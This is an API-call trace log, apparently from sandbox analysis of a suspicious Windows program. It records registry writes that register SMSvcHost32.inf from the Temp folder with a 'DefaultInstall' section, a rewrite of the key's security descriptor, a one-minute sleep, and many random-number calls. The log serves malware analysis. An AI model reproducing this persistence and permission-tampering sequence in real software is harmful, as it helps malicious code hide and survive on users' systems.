	[0075.415] GetLastError () returned 0x6
	[0075.415] GetLastError () returned 0x6
	[0075.415] GetLastError () returned 0x6
	[0075.415] GetLastError () returned 0x6
	[0075.415] GetLastError () returned 0x6
	[0075.415] GetLastError () returned 0x6
	[0075.415] GetLastError () returned 0x6
	[0075.415] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] GetLastError () returned 0x6
	[0075.416] RegSetValueExW (in: hKey=0x224, lpValueName="Count", Reserved=0x0, dwType=0x4, lpData=0x292fdc0*=0x1, cbData=0x4 | out: lpData=0x292fdc0*=0x1) returned 0x0
	[0075.416] RegSetValueExW (in: hKey=0x224, lpValueName="Path1", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.inf", cbData=0x68 | out: lpData="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.inf") returned 0x0
	[0075.417] RegSetValueExW (in: hKey=0x224, lpValueName="Section1", Reserved=0x0, dwType=0x1, lpData="DefaultInstall", cbData=0x1c | out: lpData="DefaultInstall") returned 0x0
	[0075.417] _alloca_probe () returned 0x40b00d
	[0075.418] RegGetKeySecurity (in: hKey=0x224, SecurityInformation=0x4, pSecurityDescriptor=0x291fd3c, lpcbSecurityDescriptor=0x292fd7c | out: pSecurityDescriptor=0x291fd3c, lpcbSecurityDescriptor=0x292fd7c) returned 0x0
	[0075.419] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x292fd50, dwRevision=0x1 | out: pSecurityDescriptor=0x292fd50) returned 1
	[0075.419] GetSecurityDescriptorDacl (in: pSecurityDescriptor=0x291fd3c, lpbDaclPresent=0x292fd78, pDacl=0x292fd80, lpbDaclDefaulted=0x292fd64 | out: lpbDaclPresent=0x292fd78, pDacl=0x292fd80, lpbDaclDefaulted=0x292fd64) returned 1
	[0075.419] GetAclInformation (in: pAcl=0x291fd50, pAclInformation=0x292fd68, nAclInformationLength=0xc, dwAclInformationClass=0x2 | out: pAclInformation=0x292fd68) returned 1
	[0075.419] LocalAlloc (uFlags=0x40, uBytes=0x7c) returned 0x710e08
	[0075.419] InitializeAcl (in: pAcl=0x710e08, nAclLength=0x7c, dwAclRevision=0x2 | out: pAcl=0x710e08) returned 1
	[0075.419] GetAce (in: pAcl=0x291fd50, dwAceIndex=0x0, pAce=0x292fd90 | out: pAce=0x292fd90*=0x291fd58) returned 1
	[0075.419] AddAce (in: pAcl=0x710e08, dwAceRevision=0x2, dwStartingAceIndex=0xffffffff, pAceList=0x291fd58, nAceListLength=0x24 | out: pAcl=0x710e08) returned 1
	[0075.419] GetAce (in: pAcl=0x291fd50, dwAceIndex=0x1, pAce=0x292fd90 | out: pAce=0x292fd90*=0x291fd7c) returned 1
	[0075.419] AddAce (in: pAcl=0x710e08, dwAceRevision=0x2, dwStartingAceIndex=0xffffffff, pAceList=0x291fd7c, nAceListLength=0x14 | out: pAcl=0x710e08) returned 1
	[0075.419] GetAce (in: pAcl=0x291fd50, dwAceIndex=0x2, pAce=0x292fd90 | out: pAce=0x292fd90*=0x291fd90) returned 1
	[0075.419] AddAce (in: pAcl=0x710e08, dwAceRevision=0x2, dwStartingAceIndex=0xffffffff, pAceList=0x291fd90, nAceListLength=0x18 | out: pAcl=0x710e08) returned 1
	[0075.419] GetAce (in: pAcl=0x291fd50, dwAceIndex=0x3, pAce=0x292fd90 | out: pAce=0x292fd90*=0x291fda8) returned 1
	[0075.419] AddAce (in: pAcl=0x710e08, dwAceRevision=0x2, dwStartingAceIndex=0xffffffff, pAceList=0x291fda8, nAceListLength=0x14 | out: pAcl=0x710e08) returned 1
	[0075.419] SetSecurityDescriptorDacl (in: pSecurityDescriptor=0x292fd50, bDaclPresent=1, pDacl=0x710e08, bDaclDefaulted=0 | out: pSecurityDescriptor=0x292fd50) returned 1
	[0075.419] RegSetKeySecurity (hKey=0x224, SecurityInformation=0x4, pSecurityDescriptor=0x292fd50) returned 0x0
	[0075.419] LocalFree (hMem=0x710e08) returned 0x0
	[0075.419] RegCloseKey (hKey=0x224) returned 0x0
	[0075.420] Sleep (dwMilliseconds=0xea60) 
	[0085.575] GetLastError () returned 0x6
	[0085.575] GetLastError () returned 0x6
	[0085.575] GetLastError () returned 0x6
	[0085.575] GetLastError () returned 0x6
	[0085.575] GetLastError () returned 0x6
	[0085.575] GetLastError () returned 0x6
	[0085.575] GetLastError () returned 0x6
	[0085.575] GetLastError () returned 0x6
	[0085.575] GetLastError () returned 0x6
	[0085.575] GetLastError () returned 0x6
	[0085.575] GetLastError () returned 0x6
	[0085.575] GetLastError () returned 0x6
	[0085.575] GetLastError () returned 0x6
	[0085.575] GetLastError () returned 0x6
	[0085.575] GetLastError () returned 0x6
	[0085.575] GetLastError () returned 0x6
	[0085.575] GetLastError () returned 0x6
	[0085.575] GetLastError () returned 0x6
	[0085.575] GetLastError () returned 0x6
	[0085.575] GetLastError () returned 0x6
	[0085.575] GetLastError () returned 0x6
	[0085.575] GetLastError () returned 0x6
	[0085.575] GetLastError () returned 0x6
	[0085.575] GetLastError () returned 0x6
	[0085.575] GetLastError () returned 0x6
	[0085.575] GetLastError () returned 0x6
	[0085.575] GetLastError () returned 0x6
	[0085.575] GetLastError () returned 0x6
	[0085.575] GetLastError () returned 0x6
	[0085.575] GetLastError () returned 0x6
	[0085.575] GetLastError () returned 0x6
	[0085.575] GetLastError () returned 0x6
	[0085.575] GetLastError () returned 0x6
	[0085.575] GetLastError () returned 0x6
	[0085.575] GetLastError () returned 0x6
	[0085.575] GetLastError () returned 0x6
	[0085.575] GetLastError () returned 0x6
	[0085.575] GetLastError () returned 0x6
	[0085.575] GetLastError () returned 0x6
	[0085.575] GetLastError () returned 0x6
	[0085.575] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.576] GetLastError () returned 0x6
	[0085.577] GetLastError () returned 0x6
	[0085.577] GetLastError () returned 0x6
	[0085.577] GetLastError () returned 0x6
	[0085.577] GetLastError () returned 0x6
	[0085.577] GetLastError () returned 0x6
	[0085.577] GetLastError () returned 0x6
	[0085.577] GetLastError () returned 0x6
	[0085.577] GetLastError () returned 0x6
	[0085.577] GetLastError () returned 0x6
	[0085.577] GetLastError () returned 0x6
	[0085.577] GetLastError () returned 0x6
	[0085.577] GetLastError () returned 0x6
	[0085.577] GetLastError () returned 0x6
	[0085.577] GetLastError () returned 0x6
	[0085.577] GetLastError () returned 0x6
	[0085.577] GetLastError () returned 0x6
	[0085.577] GetLastError () returned 0x6
	[0085.577] GetLastError () returned 0x6
	[0085.577] GetLastError () returned 0x6
	[0085.577] GetLastError () returned 0x6
	[0085.577] GetLastError () returned 0x6
	[0085.577] GetLastError () returned 0x6
	[0085.577] GetLastError () returned 0x6
	[0085.577] GetLastError () returned 0x6
	[0085.577] GetLastError () returned 0x6
	[0085.577] GetLastError () returned 0x6
	[0085.577] GetLastError () returned 0x6
	[0085.577] GetLastError () returned 0x6
	[0085.577] GetLastError () returned 0x6
	[0085.577] GetLastError () returned 0x6
	[0085.577] GetLastError () returned 0x6
	[0085.577] GetLastError () returned 0x6
	[0085.577] GetLastError () returned 0x6
	[0085.577] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0085.577] GetLastError () returned 0x6
	[0085.577] GetLastError () returned 0x6
	[0085.577] GetLastError () returned 0x6
	[0085.577] GetLastError () returned 0x6
	[0085.577] GetLastError () returned 0x6
	[0085.577] GetLastError () returned 0x6
	[0085.577] GetLastError () returned 0x6
	[0085.577] GetLastError () returned 0x6
	[0085.577] GetLastError () returned 0x6
	[0085.577] GetLastError () returned 0x6
	[0085.577] GetLastError () returned 0x6
	[0085.578] GetLastError () returned 0x6
	[0085.578] GetLastError () returned 0x6
	[0085.578] GetLastError () returned 0x6
	[0085.578] GetLastError () returned 0x6
	[0085.578] GetLastError () returned 0x6
	[0085.578] GetLastError () returned 0x6
	[0085.578] GetLastError () returned 0x6
	[0085.578] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0085.578] GetLastError () returned 0x6
	[0085.578] GetLastError () returned 0x6
	[0085.578] GetLastError () returned 0x6
	[0085.578] GetLastError () returned 0x6
	[0085.578] GetLastError () returned 0x6
	[0085.578] GetLastError () returned 0x6
	[0085.578] GetLastError () returned 0x6
	[0085.578] GetLastError () returned 0x6
	[0085.578] GetLastError () returned 0x6
	[0085.578] GetLastError () returned 0x6
	[0085.578] GetLastError () returned 0x6
	[0085.578] GetLastError () returned 0x6
	[0085.578] GetLastError () returned 0x6
	[0085.578] GetLastError () returned 0x6
	[0085.578] GetLastError () returned 0x6
	[0085.578] GetLastError () returned 0x6
	[0085.578] GetLastError () returned 0x6
	[0085.578] GetLastError () returned 0x6
	[0085.578] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0085.578] GetLastError () returned 0x6
	[0085.578] GetLastError () returned 0x6
	[0085.578] GetLastError () returned 0x6
	[0085.578] GetLastError () returned 0x6
	[0085.578] GetLastError () returned 0x6
	[0085.578] GetLastError () returned 0x6
	[0085.578] GetLastError () returned 0x6
	[0085.578] GetLastError () returned 0x6
	[0085.578] GetLastError () returned 0x6
	[0085.578] GetLastError () returned 0x6
	[0085.578] GetLastError () returned 0x6
	[0085.578] GetLastError () returned 0x6
	[0085.578] GetLastError () returned 0x6
	[0085.578] GetLastError () returned 0x6
	[0085.578] GetLastError () returned 0x6
	[0085.578] GetLastError () returned 0x6
	[0085.578] GetLastError () returned 0x6
	[0085.578] GetLastError () returned 0x6
	[0085.578] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0085.578] GetLastError () returned 0x6
	[0085.578] GetLastError () returned 0x6
	[0085.579] GetLastError () returned 0x6
	[0085.579] GetLastError () returned 0x6
	[0085.579] GetLastError () returned 0x6
	[0085.579] GetLastError () returned 0x6
	[0085.579] GetLastError () returned 0x6
	[0085.579] GetLastError () returned 0x6
	[0085.579] GetLastError () returned 0x6
	[0085.579] GetLastError () returned 0x6
	[0085.579] GetLastError () returned 0x6
	[0085.579] GetLastError () returned 0x6
	[0085.579] GetLastError () returned 0x6
	[0085.579] GetLastError () returned 0x6
	[0085.579] GetLastError () returned 0x6
	[0085.579] GetLastError () returned 0x6
	[0085.579] GetLastError () returned 0x6
	[0085.579] GetLastError () returned 0x6
	[0085.579] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0085.579] GetLastError () returned 0x6
	[0085.579] GetLastError () returned 0x6
	[0085.579] GetLastError () returned 0x6
	[0085.579] GetLastError () returned 0x6
	[0085.579] GetLastError () returned 0x6
	[0085.579] GetLastError () returned 0x6
	[0085.579] GetLastError () returned 0x6
	[0085.579] GetLastError () returned 0x6
	[0085.579] GetLastError () returned 0x6
	[0085.579] GetLastError () returned 0x6
	[0085.579] GetLastError () returned 0x6
	[0085.579] GetLastError () returned 0x6
	[0085.579] GetLastError () returned 0x6
	[0085.579] GetLastError () returned 0x6
	[0085.579] GetLastError () returned 0x6
	[0085.579] GetLastError () returned 0x6
	[0085.579] GetLastError () returned 0x6
	[0085.579] GetLastError () returned 0x6
	[0085.579] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0085.579] GetLastError () returned 0x6
	[0085.579] GetLastError () returned 0x6
	[0085.579] GetLastError () returned 0x6
	[0085.579] GetLastError () returned 0x6
	[0085.579] GetLastError () returned 0x6
	[0085.579] GetLastError () returned 0x6
	[0085.579] GetLastError () returned 0x6
	[0085.579] GetLastError () returned 0x6
	[0085.579] GetLastError () returned 0x6
	[0085.579] GetLastError () returned 0x6
	[0085.579] GetLastError () returned 0x6
	[0085.579] GetLastError () returned 0x6
	[0085.579] GetLastError () returned 0x6
	[0085.579] GetLastError () returned 0x6
	[0085.579] GetLastError () returned 0x6
	[0085.580] GetLastError () returned 0x6
	[0085.580] GetLastError () returned 0x6
	[0085.580] GetLastError () returned 0x6
	[0085.580] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0085.580] GetLastError () returned 0x6
	[0085.580] GetLastError () returned 0x6
	[0085.580] GetLastError () returned 0x6
	[0085.580] GetLastError () returned 0x6
	[0085.580] GetLastError () returned 0x6
	[0085.580] GetLastError () returned 0x6
	[0085.580] GetLastError () returned 0x6
	[0085.580] GetLastError () returned 0x6
	[0085.580] GetLastError () returned 0x6
	[0085.580] GetLastError () returned 0x6
	[0085.580] GetLastError () returned 0x6
	[0085.580] GetLastError () returned 0x6
	[0085.580] GetLastError () returned 0x6
	[0085.580] GetLastError () returned 0x6
	[0085.580] GetLastError () returned 0x6
	[0085.580] GetLastError () returned 0x6
	[0085.580] GetLastError () returned 0x6
	[0085.580] GetLastError () returned 0x6
	[0085.580] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0085.580] GetLastError () returned 0x6
	[0085.580] GetLastError () returned 0x6
	[0085.580] GetLastError () returned 0x6
	[0085.580] GetLastError () returned 0x6
	[0085.580] GetLastError () returned 0x6
	[0085.580] GetLastError () returned 0x6
	[0085.580] GetLastError () returned 0x6
	[0085.580] GetLastError () returned 0x6
	[0085.580] GetLastError () returned 0x6
	[0085.580] GetLastError () returned 0x6
	[0085.580] GetLastError () returned 0x6
	[0085.580] GetLastError () returned 0x6
	[0085.580] GetLastError () returned 0x6
	[0085.580] GetLastError () returned 0x6
	[0085.580] GetLastError () returned 0x6
	[0085.580] GetLastError () returned 0x6
	[0085.580] GetLastError () returned 0x6
	[0085.580] GetLastError () returned 0x6
	[0085.580] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0085.580] GetLastError () returned 0x6
	[0085.580] GetLastError () returned 0x6
	[0085.580] GetLastError () returned 0x6
	[0085.580] GetLastError () returned 0x6
	[0085.580] GetLastError () returned 0x6
	[0085.580] GetLastError () returned 0x6
	[0085.581] GetLastError () returned 0x6
	[0085.581] GetLastError () returned 0x6
	[0085.581] GetLastError () returned 0x6
	[0085.581] GetLastError () returned 0x6
	[0085.581] GetLastError () returned 0x6
	[0085.581] GetLastError () returned 0x6
	[0085.581] GetLastError () returned 0x6
	[0085.581] GetLastError () returned 0x6
	[0085.581] GetLastError () returned 0x6
	[0085.581] GetLastError () returned 0x6
	[0085.581] GetLastError () returned 0x6
	[0085.581] GetLastError () returned 0x6
	[0085.581] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0085.581] GetLastError () returned 0x6
	[0085.581] GetLastError () returned 0x6
	[0085.581] GetLastError () returned 0x6
	[0085.581] GetLastError () returned 0x6
	[0085.581] GetLastError () returned 0x6
	[0085.581] GetLastError () returned 0x6
	[0085.581] GetLastError () returned 0x6
	[0085.581] GetLastError () returned 0x6
	[0085.581] GetLastError () returned 0x6
	[0085.581] GetLastError () returned 0x6
	[0085.581] GetLastError () returned 0x6
	[0085.581] GetLastError () returned 0x6
	[0085.581] GetLastError () returned 0x6
	[0085.581] GetLastError () returned 0x6
	[0085.581] GetLastError () returned 0x6
	[0085.581] GetLastError () returned 0x6
	[0085.581] GetLastError () returned 0x6
	[0085.581] GetLastError () returned 0x6
	[0085.581] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0085.581] GetLastError () returned 0x6
	[0085.581] GetLastError () returned 0x6
	[0085.581] GetLastError () returned 0x6
	[0085.581] GetLastError () returned 0x6
	[0085.581] GetLastError () returned 0x6
	[0085.581] GetLastError () returned 0x6
	[0085.581] GetLastError () returned 0x6
	[0085.581] GetLastError () returned 0x6
	[0085.581] GetLastError () returned 0x6
	[0085.581] GetLastError () returned 0x6
	[0085.581] GetLastError () returned 0x6
	[0085.581] GetLastError () returned 0x6
	[0085.581] GetLastError () returned 0x6
	[0085.581] GetLastError () returned 0x6
	[0085.582] GetLastError () returned 0x6
	[0085.582] GetLastError () returned 0x6
	[0085.582] GetLastError () returned 0x6
	[0085.582] GetLastError () returned 0x6
	[0085.582] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0085.582] GetLastError () returned 0x6
	[0085.582] GetLastError () returned 0x6
	[0085.582] GetLastError () returned 0x6
	[0085.582] GetLastError () returned 0x6
	[0085.582] GetLastError () returned 0x6
	[0085.582] GetLastError () returned 0x6
	[0085.582] GetLastError () returned 0x6
	[0085.582] GetLastError () returned 0x6
	[0085.582] GetLastError () returned 0x6
	[0085.582] GetLastError () returned 0x6
	[0085.582] GetLastError () returned 0x6
	[0085.582] GetLastError () returned 0x6
	[0085.582] GetLastError () returned 0x6
	[0085.582] GetLastError () returned 0x6
	[0085.582] GetLastError () returned 0x6
	[0085.582] GetLastError () returned 0x6
	[0085.582] GetLastError () returned 0x6
	[0085.582] GetLastError () returned 0x6
	[0085.582] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0085.582] GetLastError () returned 0x6
	[0085.582] GetLastError () returned 0x6
	[0085.582] GetLastError () returned 0x6
	[0085.582] GetLastError () returned 0x6
	[0085.582] GetLastError () returned 0x6
	[0085.582] GetLastError () returned 0x6
	[0085.582] GetLastError () returned 0x6
	[0085.582] GetLastError () returned 0x6
	[0085.582] GetLastError () returned 0x6
	[0085.582] GetLastError () returned 0x6
	[0085.582] GetLastError () returned 0x6
	[0085.582] GetLastError () returned 0x6
	[0085.582] GetLastError () returned 0x6
	[0085.582] GetLastError () returned 0x6
	[0085.582] GetLastError () returned 0x6
	[0085.582] GetLastError () returned 0x6
	[0085.582] GetLastError () returned 0x6
	[0085.582] GetLastError () returned 0x6
	[0085.582] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0085.583] GetLastError () returned 0x6
	[0085.583] GetLastError () returned 0x6
	[0085.583] GetLastError () returned 0x6
	[0085.583] GetLastError () returned 0x6
	[0085.583] GetLastError () returned 0x6
	[0085.583] GetLastError () returned 0x6
	[0085.583] GetLastError () returned 0x6
	[0085.583] GetLastError () returned 0x6
	[0085.583] GetLastError () returned 0x6
	[0085.583] GetLastError () returned 0x6
	[0085.583] GetLastError () returned 0x6
	[0085.583] GetLastError () returned 0x6
	[0085.583] GetLastError () returned 0x6
	[0085.583] GetLastError () returned 0x6
	[0085.583] GetLastError () returned 0x6
	[0085.583] GetLastError () returned 0x6
	[0085.583] GetLastError () returned 0x6
	[0085.583] GetLastError () returned 0x6
	[0085.583] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0085.583] GetLastError () returned 0x6
	[0085.583] GetLastError () returned 0x6
	[0085.583] GetLastError () returned 0x6
	[0085.583] GetLastError () returned 0x6
	[0085.583] GetLastError () returned 0x6
	[0085.583] GetLastError () returned 0x6
	[0085.583] GetLastError () returned 0x6
	[0085.583] GetLastError () returned 0x6
	[0085.583] GetLastError () returned 0x6
	[0085.583] GetLastError () returned 0x6
	[0085.583] GetLastError () returned 0x6
	[0085.583] GetLastError () returned 0x6
	[0085.583] GetLastError () returned 0x6
	[0085.583] GetLastError () returned 0x6
	[0085.583] GetLastError () returned 0x6
	[0085.583] GetLastError () returned 0x6
	[0085.583] GetLastError () returned 0x6
	[0085.583] GetLastError () returned 0x6
	[0085.583] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0085.584] GetLastError () returned 0x6
	[0085.584] GetLastError () returned 0x6
	[0085.584] GetLastError () returned 0x6
	[0085.584] GetLastError () returned 0x6
	[0085.584] GetLastError () returned 0x6
	[0085.584] GetLastError () returned 0x6
	[0085.584] GetLastError () returned 0x6
	[0085.584] GetLastError () returned 0x6
	[0085.584] GetLastError () returned 0x6
	[0085.584] GetLastError () returned 0x6
	[0085.584] GetLastError () returned 0x6
	[0085.584] GetLastError () returned 0x6
	[0085.584] GetLastError () returned 0x6
	[0085.584] GetLastError () returned 0x6
	[0085.584] GetLastError () returned 0x6
	[0085.584] GetLastError () returned 0x6
	[0085.584] GetLastError () returned 0x6
	[0085.584] GetLastError () returned 0x6
	[0085.584] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0085.584] GetLastError () returned 0x6
	[0085.584] GetLastError () returned 0x6
	[0085.584] GetLastError () returned 0x6
	[0085.584] GetLastError () returned 0x6
	[0085.584] GetLastError () returned 0x6
	[0085.584] GetLastError () returned 0x6
	[0085.584] GetLastError () returned 0x6
	[0085.584] GetLastError () returned 0x6
	[0085.584] GetLastError () returned 0x6
	[0085.584] GetLastError () returned 0x6
	[0085.584] GetLastError () returned 0x6
	[0085.584] GetLastError () returned 0x6
	[0085.584] GetLastError () returned 0x6
	[0085.584] GetLastError () returned 0x6
	[0085.584] GetLastError () returned 0x6
	[0085.584] GetLastError () returned 0x6
	[0085.584] GetLastError () returned 0x6
	[0085.584] GetLastError () returned 0x6
	[0085.585] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0085.585] GetLastError () returned 0x6
	[0085.585] GetLastError () returned 0x6
	[0085.585] GetLastError () returned 0x6
	[0085.585] GetLastError () returned 0x6
	[0085.585] GetLastError () returned 0x6
	[0085.585] GetLastError () returned 0x6
	[0085.585] GetLastError () returned 0x6
	[0085.585] GetLastError () returned 0x6
	[0085.585] GetLastError () returned 0x6
	[0085.585] GetLastError () returned 0x6
	[0085.585] GetLastError () returned 0x6
	[0085.585] GetLastError () returned 0x6
	[0085.585] GetLastError () returned 0x6
	[0085.585] GetLastError () returned 0x6
	[0085.585] GetLastError () returned 0x6
	[0085.585] GetLastError () returned 0x6
	[0085.585] GetLastError () returned 0x6
	[0085.585] GetLastError () returned 0x6
	[0085.585] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0085.585] GetLastError () returned 0x6
	[0085.585] GetLastError () returned 0x6
	[0085.585] GetLastError () returned 0x6
	[0085.585] GetLastError () returned 0x6
	[0085.585] GetLastError () returned 0x6
	[0085.585] GetLastError () returned 0x6
	[0085.585] GetLastError () returned 0x6
	[0085.585] GetLastError () returned 0x6
	[0085.585] GetLastError () returned 0x6
	[0085.585] GetLastError () returned 0x6
	[0085.585] GetLastError () returned 0x6
	[0085.585] GetLastError () returned 0x6
	[0085.585] GetLastError () returned 0x6
	[0085.585] GetLastError () returned 0x6
	[0085.585] GetLastError () returned 0x6
	[0085.585] GetLastError () returned 0x6
	[0085.585] GetLastError () returned 0x6
	[0085.585] GetLastError () returned 0x6
	[0085.585] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0085.586] GetLastError () returned 0x6
	[0085.586] GetLastError () returned 0x6
	[0085.586] GetLastError () returned 0x6
	[0085.586] GetLastError () returned 0x6
	[0085.586] GetLastError () returned 0x6
	[0085.586] GetLastError () returned 0x6
	[0085.586] GetLastError () returned 0x6
	[0085.586] GetLastError () returned 0x6
	[0085.586] GetLastError () returned 0x6
	[0085.586] GetLastError () returned 0x6
	[0085.586] GetLastError () returned 0x6
	[0085.586] GetLastError () returned 0x6
	[0085.586] GetLastError () returned 0x6
	[0085.586] GetLastError () returned 0x6
	[0085.586] GetLastError () returned 0x6
	[0085.586] GetLastError () returned 0x6
	[0085.586] GetLastError () returned 0x6
	[0085.586] GetLastError () returned 0x6
	[0085.586] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0085.586] GetLastError () returned 0x6
	[0085.586] GetLastError () returned 0x6
	[0085.586] GetLastError () returned 0x6
	[0085.586] GetLastError () returned 0x6
	[0085.586] GetLastError () returned 0x6
	[0085.586] GetLastError () returned 0x6
	[0085.586] GetLastError () returned 0x6
	[0085.586] GetLastError () returned 0x6
	[0085.586] GetLastError () returned 0x6
	[0085.586] GetLastError () returned 0x6
	[0085.586] GetLastError () returned 0x6
	[0085.586] GetLastError () returned 0x6
	[0085.586] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0085.587] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0085.587] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0085.587] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0085.587] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0085.587] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
